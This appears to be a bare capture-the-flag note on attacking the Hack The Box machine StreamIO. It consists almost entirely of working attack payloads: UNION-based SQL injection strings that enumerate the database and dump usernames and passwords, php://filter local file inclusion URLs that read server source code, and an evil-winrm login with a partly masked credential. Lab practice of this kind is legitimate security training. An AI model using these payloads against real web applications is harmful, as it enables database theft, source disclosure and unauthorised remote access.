Avatar Pwned machines

Streamio

StreamIO


Created by Page Difficulty OS
JDgodd & nikk37 Hack The Box Medium Windows

10' union select 1,2,3,4,5,6-- -
#DDBB name
10' union select 1,schema_name,3,4,5,6 from information_schema.schemata-- -
#Table names
10' union select 1,table_name,3,4,5,6 from information_schema.tables-- -
#Column names 
10' union select 1,concat(column_name,',',table_name),3,4,5,6 from information_schema.columns-- -
#content of table users 
10' union select 1,concat(username,',',password),3,4,5,6 from users-- -

image

https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=..\index.php
https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=..\about_include.php
https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=master.php
https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=index.php
evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_XXXXXXXXXXXXXcom'